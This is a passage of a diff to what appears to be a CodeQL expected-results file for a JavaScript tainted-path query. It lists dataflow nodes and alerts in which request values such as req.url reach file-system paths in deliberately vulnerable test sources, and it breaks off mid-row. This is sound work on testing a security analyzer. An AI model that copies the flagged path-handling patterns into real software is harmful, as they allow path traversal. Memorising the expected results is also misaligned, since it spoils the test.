+| other-fs-libraries.js:76:19:76:19 | x | semmle.label | x | +| other-fs-libraries.js:81:7:81:48 | path | semmle.label | path | +| other-fs-libraries.js:81:14:81:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| other-fs-libraries.js:81:14:81:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| other-fs-libraries.js:81:14:81:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| other-fs-libraries.js:81:24:81:30 | req.url | semmle.label | req.url | +| other-fs-libraries.js:83:16:83:19 | path | semmle.label | path | +| prettier.js:6:11:6:28 | p | semmle.label | p | +| prettier.js:6:13:6:13 | p | semmle.label | p | +| prettier.js:7:28:7:28 | p | semmle.label | p | +| prettier.js:11:44:11:44 | p | semmle.label | p | +| pupeteer.js:5:9:5:71 | tainted | semmle.label | tainted | +| pupeteer.js:5:19:5:71 | "dir/" ... t.data" | semmle.label | "dir/" ... t.data" | +| pupeteer.js:5:28:5:53 | parseTo ... t).name | semmle.label | parseTo ... t).name | +| pupeteer.js:9:28:9:34 | tainted | semmle.label | tainted | +| pupeteer.js:13:37:13:43 | tainted | semmle.label | tainted | +| sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | semmle.label | req.par ... spaceId | +| sharedlib-repro.js:21:27:21:34 | filepath | semmle.label | filepath | +| sharedlib-repro.js:22:18:22:25 | filepath | semmle.label | filepath | +| tainted-access-paths.js:6:7:6:48 | path | semmle.label | path | +| tainted-access-paths.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-access-paths.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-access-paths.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-access-paths.js:6:24:6:30 | req.url | semmle.label | req.url | +| tainted-access-paths.js:8:19:8:22 | path | semmle.label | path | +| tainted-access-paths.js:10:7:10:36 | obj | semmle.label | obj | +| tainted-access-paths.js:10:33:10:36 | path | semmle.label | path | +| tainted-access-paths.js:12:19:12:21 | obj | semmle.label | obj | +| tainted-access-paths.js:12:19:12:25 | obj.sub | semmle.label | obj.sub | +| tainted-access-paths.js:26:19:26:21 | obj | semmle.label | obj | +| tainted-access-paths.js:26:19:26:26 | obj.sub3 | semmle.label | obj.sub3 | +| tainted-access-paths.js:29:21:29:23 | obj | semmle.label | obj | +| tainted-access-paths.js:29:21:29:28 | obj.sub4 | semmle.label | obj.sub4 | +| tainted-access-paths.js:30:23:30:25 | obj | semmle.label | obj | +| tainted-access-paths.js:30:23:30:30 | obj.sub4 | semmle.label | obj.sub4 | +| tainted-access-paths.js:31:23:31:25 | obj | semmle.label | obj | +| tainted-access-paths.js:31:23:31:30 | obj.sub4 | semmle.label | obj.sub4 | +| tainted-access-paths.js:39:7:39:48 | path | semmle.label | path | +| tainted-access-paths.js:39:14:39:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-access-paths.js:39:14:39:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-access-paths.js:39:14:39:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-access-paths.js:39:24:39:30 | req.url | semmle.label | req.url | +| tainted-access-paths.js:40:23:40:26 | path | semmle.label | path | +| tainted-access-paths.js:48:7:48:48 | path | semmle.label | path | +| tainted-access-paths.js:48:14:48:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-access-paths.js:48:14:48:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-access-paths.js:48:14:48:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-access-paths.js:48:24:48:30 | req.url | semmle.label | req.url | +| tainted-access-paths.js:49:10:49:13 | path | semmle.label | path | +| tainted-promise-steps.js:6:7:6:48 | path | semmle.label | path | +| tainted-promise-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-promise-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-promise-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-promise-steps.js:6:24:6:30 | req.url | semmle.label | req.url | +| tainted-promise-steps.js:7:10:7:30 | Promise ... e(path) [PromiseValue] | semmle.label | Promise ... e(path) [PromiseValue] | +| tainted-promise-steps.js:7:26:7:29 | path | semmle.label | path | +| tainted-promise-steps.js:10:23:10:33 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | +| tainted-promise-steps.js:11:19:11:35 | await pathPromise | semmle.label | await pathPromise | +| tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | +| tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | +| tainted-promise-steps.js:12:20:12:23 | path | semmle.label | path | +| tainted-promise-steps.js:12:44:12:47 | path | semmle.label | path | +| tainted-require.js:6:19:6:37 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:11:29:11:47 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:13:11:13:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | +| tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:28:37:28:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:30:34:30:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | +| tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| tainted-string-steps.js:6:24:6:30 | req.url | semmle.label | req.url | +| tainted-string-steps.js:8:18:8:21 | path | semmle.label | path | +| tainted-string-steps.js:8:18:8:34 | path.substring(4) | semmle.label | path.substring(4) | +| tainted-string-steps.js:9:18:9:21 | path | semmle.label | path | +| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | semmle.label | path.substring(0, i) | +| tainted-string-steps.js:10:18:10:21 | path | semmle.label | path | +| tainted-string-steps.js:10:18:10:31 | path.substr(4) | semmle.label | path.substr(4) | +| tainted-string-steps.js:11:18:11:21 | path | semmle.label | path | +| tainted-string-steps.js:11:18:11:30 | path.slice(4) | semmle.label | path.slice(4) | +| tainted-string-steps.js:13:18:13:21 | path | semmle.label | path | +| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | semmle.label | path.concat(unknown) | +| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | semmle.label | unknown.concat(path) | +| tainted-string-steps.js:14:33:14:36 | path | semmle.label | path | +| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | semmle.label | unknown ... , path) | +| tainted-string-steps.js:15:42:15:45 | path | semmle.label | path | +| tainted-string-steps.js:17:18:17:21 | path | semmle.label | path | +| tainted-string-steps.js:17:18:17:28 | path.trim() | semmle.label | path.trim() | +| tainted-string-steps.js:18:18:18:21 | path | semmle.label | path | +| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | semmle.label | path.toLowerCase() | +| tainted-string-steps.js:22:18:22:21 | path | semmle.label | path | +| tainted-string-steps.js:22:18:22:32 | path.split('/') | semmle.label | path.split('/') | +| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | semmle.label | path.split('/')[i] | +| tainted-string-steps.js:23:18:23:21 | path | semmle.label | path | +| tainted-string-steps.js:23:18:23:33 | path.split(/\\//) | semmle.label | path.split(/\\//) | +| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | semmle.label | path.split(/\\//)[i] | +| tainted-string-steps.js:24:18:24:21 | path | semmle.label | path | +| tainted-string-steps.js:24:18:24:32 | path.split("?") | semmle.label | path.split("?") | +| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | semmle.label | path.split("?")[0] | +| tainted-string-steps.js:26:18:26:21 | path | semmle.label | path | +| tainted-string-steps.js:26:18:26:36 | path.split(unknown) | semmle.label | path.split(unknown) | +| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | semmle.label | path.sp ... hatever | +| tainted-string-steps.js:27:18:27:21 | path | semmle.label | path | +| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | semmle.label | path.split(unknown) | +| torrents.js:5:6:5:38 | name | semmle.label | name | +| torrents.js:5:13:5:38 | parseTo ... t).name | semmle.label | parseTo ... t).name | +| torrents.js:6:6:6:45 | loc | semmle.label | loc | +| torrents.js:6:12:6:45 | dir + " ... t.data" | semmle.label | dir + " ... t.data" | +| torrents.js:6:24:6:27 | name | semmle.label | name | +| torrents.js:7:25:7:27 | loc | semmle.label | loc | +| typescript.ts:9:7:9:48 | path | semmle.label | path | +| typescript.ts:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| typescript.ts:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| typescript.ts:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| typescript.ts:9:24:9:30 | req.url | semmle.label | req.url | +| typescript.ts:11:29:11:32 | path | semmle.label | path | +| typescript.ts:19:7:19:18 | path3 | semmle.label | path3 | +| typescript.ts:19:15:19:18 | path | semmle.label | path | +| typescript.ts:20:39:20:43 | path3 | semmle.label | path3 | +| typescript.ts:22:7:22:18 | path4 | semmle.label | path4 | +| typescript.ts:22:15:22:18 | path | semmle.label | path | +| typescript.ts:23:39:23:43 | path4 | semmle.label | path4 | +| typescript.ts:29:7:29:18 | path6 | semmle.label | path6 | +| typescript.ts:29:15:29:18 | path | semmle.label | path | +| typescript.ts:31:29:31:33 | path6 | semmle.label | path6 | +| views.js:1:43:1:55 | req.params[0] | semmle.label | req.params[0] | subpaths -#select -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:10:26:10:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | -| TaintedPath.js:12:29:12:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:12:29:12:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:15:29:15:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:18:33:18:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:18:33:18:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:21:33:21:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:21:33:21:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:24:33:24:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:24:33:24:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:33:31:33:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:33:31:33:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:52:29:52:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:65:31:65:76 | require ... ).query | TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:65:63:65:69 | req.url | user-provided value | -| TaintedPath.js:66:31:66:74 | require ... ).query | TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:66:61:66:67 | req.url | user-provided value | -| TaintedPath.js:67:31:67:73 | require ... ).query | TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:67:60:67:66 | req.url | user-provided value | -| TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:75:48:75:60 | req.params[0] | user-provided value | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:89:45:89:52 | realpath | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:89:45:89:52 | realpath | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:122:23:122:26 | path | TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:122:23:122:26 | path | This path depends on a $@. | TaintedPath.js:120:23:120:29 | req.url | user-provided value | -| TaintedPath.js:128:19:128:22 | path | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:128:19:128:22 | path | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:132:19:132:33 | split.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:132:19:132:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:136:19:136:26 | split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:136:19:136:26 | split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:137:19:137:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:140:19:140:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:143:19:143:38 | concatted2.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:145:19:145:29 | split.pop() | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:145:19:145:29 | split.pop() | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:187:38:187:44 | req.url | user-provided value | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:188:51:188:57 | req.url | user-provided value | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:190:44:190:50 | req.url | user-provided value | -| TaintedPath.js:196:31:196:34 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:196:31:196:34 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:197:45:197:48 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:197:45:197:48 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:198:35:198:38 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:198:35:198:38 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:206:29:206:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:202:24:202:30 | req.url | user-provided value | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:213:29:213:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:216:31:216:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | -| express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | This path depends on a $@. | express.js:8:20:8:32 | req.query.bar | user-provided value | -| handlebars.js:11:32:11:39 | filePath | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:11:32:11:39 | filePath | This path depends on a $@. | handlebars.js:29:46:29:60 | req.params.path | user-provided value | -| handlebars.js:15:25:15:32 | filePath | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:15:25:15:32 | filePath | This path depends on a $@. | handlebars.js:43:15:43:29 | req.params.path | user-provided value | -| normalizedPaths.js:13:19:13:22 | path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:13:19:13:22 | path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:14:19:14:29 | './' + path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:14:19:14:29 | './' + path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:15:19:15:38 | path + '/index.html' | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:15:19:15:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:16:19:16:53 | pathMod ... .html') | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:16:19:16:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:17:19:17:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | -| normalizedPaths.js:23:19:23:22 | path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:23:19:23:22 | path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:24:19:24:29 | './' + path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:24:19:24:29 | './' + path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:25:19:25:38 | path + '/index.html' | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:25:19:25:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:26:19:26:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:27:19:27:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | -| normalizedPaths.js:36:19:36:22 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:36:19:36:22 | path | This path depends on a $@. | normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | -| normalizedPaths.js:41:21:41:24 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:41:21:41:24 | path | This path depends on a $@. | normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | -| normalizedPaths.js:59:19:59:22 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:59:19:59:22 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | -| normalizedPaths.js:63:19:63:38 | path + "/index.html" | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:63:19:63:38 | path + "/index.html" | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | -| normalizedPaths.js:68:21:68:24 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:68:21:68:24 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | -| normalizedPaths.js:78:22:78:25 | path | normalizedPaths.js:73:42:73:55 | req.query.path | normalizedPaths.js:78:22:78:25 | path | This path depends on a $@. | normalizedPaths.js:73:42:73:55 | req.query.path | user-provided value | -| normalizedPaths.js:87:29:87:32 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:87:29:87:32 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | -| normalizedPaths.js:90:31:90:34 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:90:31:90:34 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | -| normalizedPaths.js:99:29:99:32 | path | normalizedPaths.js:94:35:94:48 | req.query.path | normalizedPaths.js:99:29:99:32 | path | This path depends on a $@. | normalizedPaths.js:94:35:94:48 | req.query.path | user-provided value | -| normalizedPaths.js:119:19:119:22 | path | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:119:19:119:22 | path | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | -| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:120:19:120:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | -| normalizedPaths.js:135:21:135:24 | path | normalizedPaths.js:130:35:130:48 | req.query.path | normalizedPaths.js:135:21:135:24 | path | This path depends on a $@. | normalizedPaths.js:130:35:130:48 | req.query.path | user-provided value | -| normalizedPaths.js:144:21:144:24 | path | normalizedPaths.js:139:48:139:61 | req.query.path | normalizedPaths.js:144:21:144:24 | path | This path depends on a $@. | normalizedPaths.js:139:48:139:61 | req.query.path | user-provided value | -| normalizedPaths.js:151:21:151:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:151:21:151:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | -| normalizedPaths.js:153:21:153:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:153:21:153:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | -| normalizedPaths.js:165:19:165:22 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:165:19:165:22 | path | This path depends on a $@. | normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | -| normalizedPaths.js:170:21:170:24 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:170:21:170:24 | path | This path depends on a $@. | normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | -| normalizedPaths.js:184:19:184:22 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:184:19:184:22 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:187:21:187:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:187:21:187:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:189:21:189:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:189:21:189:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:192:21:192:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:192:21:192:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:194:21:194:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:194:21:194:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:199:21:199:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:199:21:199:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:205:21:205:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:205:21:205:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:208:21:208:34 | 